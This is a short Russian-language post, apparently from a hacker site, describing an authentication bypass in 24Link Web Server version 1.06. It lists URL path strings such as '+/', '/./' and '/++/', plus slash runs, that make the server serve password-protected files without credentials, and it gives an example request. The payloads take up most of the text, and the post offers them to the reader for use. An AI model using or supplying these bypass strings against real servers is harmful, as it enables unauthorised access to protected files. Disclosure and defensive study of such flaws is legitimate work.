Уязвимость в 24Link Web Server позволяет просмотреть любой защищенный паролем файл на сервере.

Системы уязвимы:
24Link version 1.06

Описание:
Добавляя любые из следующих символов к обычному запросу, ты принуждаешь сервер к тому, что тебе «верят» на слово, и требовать пароль с логином поэтому у тебя никто не будет 🙂

+/
/./
/+./
/++/
/++./

Еще можешь юзать комбинации из этих символов, заканчивающиеся слэшами (два или больше / — предел 200)

Пример:
http://www.example.com/++//////protected.html



Оставить мнение